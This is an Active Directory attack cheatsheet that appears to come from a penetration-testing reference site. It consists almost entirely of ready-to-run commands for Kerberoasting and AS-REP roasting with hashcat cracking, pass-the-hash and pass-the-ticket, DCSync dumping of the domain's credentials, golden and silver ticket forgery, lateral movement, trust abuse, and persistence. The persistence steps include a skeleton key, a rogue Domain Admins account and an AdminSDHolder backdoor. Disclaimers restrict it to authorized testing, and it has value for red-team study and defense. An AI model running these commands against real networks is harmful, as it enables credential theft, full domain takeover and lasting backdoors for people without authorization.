Quick Reference
🔥 Advanced
Active Directory Cheatsheet
Essential commands for AD enumeration, Kerberos attacks, and domain compromise.
Authorization Required
These commands are for authorized penetration testing only. Unauthorized access to AD environments is illegal.
Domain Enumeration
powershell
# Get domain info
Get-ADDomain
Get-ADForest
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Get domain controller
Get-ADDomainController
nltest /dclist:DOMAIN
# Get domain SID
Get-ADDomain | Select-Object DomainSID
# PowerView - Get domain info
Get-Domain
Get-DomainController
Get-DomainSIDUser Enumeration
powershell
# List all users
Get-ADUser -Filter * -Properties *
net user /domain
# Find privileged users
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity "Enterprise Admins" -Recursive
Get-ADGroupMember -Identity "Administrators" -Recursive
# PowerView - User enumeration
Get-DomainUser
Get-DomainUser -SPN # Kerberoastable users
Get-DomainUser -AdminCount # Protected users
Find-LocalAdminAccess # Where current user has admin
# Find users with interesting descriptions
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}Kerberos Attacks
AS-REP Roasting
bash
# Find AS-REP roastable users
Get-DomainUser -PreauthNotRequired
# Rubeus - AS-REP Roast
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Impacket - AS-REP Roast
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txtKerberoasting
bash
# Find kerberoastable users
Get-DomainUser -SPN
# Rubeus - Kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt
# Impacket - Kerberoast
GetUserSPNs.py DOMAIN/user:password -request -outputfile hashes.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txtPass the Hash/Ticket
bash
# Pass the Hash with Impacket
psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
# Pass the Hash with CrackMapExec
cme smb TARGET -u Administrator -H NTLM_HASH -x "whoami"
# Pass the Ticket with Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi
# Pass the Ticket with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET
# OverPass the Hash (Request TGT from NTLM)
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /pttDCSync Attack
bash
# DCSync with Mimikatz (requires replication rights)
lsadump::dcsync /domain:DOMAIN /user:krbtgt
lsadump::dcsync /domain:DOMAIN /all /csv
# DCSync with Impacket
secretsdump.py DOMAIN/user:password@DC_IP
secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP
# Dump entire AD database
secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-ntlmGolden & Silver Tickets
Golden Ticket
bash
# Create Golden Ticket (requires krbtgt hash)
# Mimikatz
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt
# Impacket - ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@DCSilver Ticket
bash
# Create Silver Ticket (requires service account hash)
# For CIFS (file shares)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:cifs /ptt
# For HTTP (web services)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:http /ptt
# Impacket - ticketer
ticketer.py -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn cifs/SERVER.DOMAIN AdministratorBloodHound Collection
bash
# SharpHound - Collect all data
SharpHound.exe -c All
# BloodHound Python (remote collection)
bloodhound-python -d DOMAIN -u user -p password -c All -ns DC_IP
# Specific collection methods
SharpHound.exe -c DCOnly # DC data only
SharpHound.exe -c Session # Session info only
SharpHound.exe -c ACL # ACL info only
# Loop collection (stealthy)
SharpHound.exe -c Session --loop --loopduration 02:00:00Lateral Movement
bash
# WinRM
winrs -r:TARGET -u:DOMAIN\user -p:password cmd
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
# PsExec
psexec.exe \\TARGET -u DOMAIN\user -p password cmd
psexec.py DOMAIN/user:password@TARGET
# WMI
wmiexec.py DOMAIN/user:password@TARGET
wmic /node:TARGET process call create "cmd.exe /c whoami"
# SMB
smbexec.py DOMAIN/user:password@TARGET
# DCOM
dcomexec.py DOMAIN/user:password@TARGETTrust Abuse
powershell
# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
nltest /domain_trusts /all_trusts
# Cross-domain ticket (SID History)
# Get child domain krbtgt hash and parent domain SID
kerberos::golden /user:Administrator /domain:CHILD.DOMAIN /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:PARENT_SID-519 /ptt
# Access parent domain
dir \\parent-dc.parent.domain\c$Domain Persistence
powershell
# Skeleton Key (requires DC access)
# Inject into LSASS, allows any password for any user
privilege::debug
misc::skeleton
# Add user to Domain Admins
net group "Domain Admins" hacker /add /domain
# AdminSDHolder - Get persistent admin access
# Add user to AdminSDHolder ACL, propagates hourly
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity hacker -Rights All
# DSRM Password Change
# Change DSRM password (can log in as local admin on DC)
ntdsutil "set dsrm password" "reset password on server null" q q⚠️ Legal Disclaimer
Active Directory attacks can cause significant damage to production environments. Only use these techniques on systems you own or have explicit written authorization to test.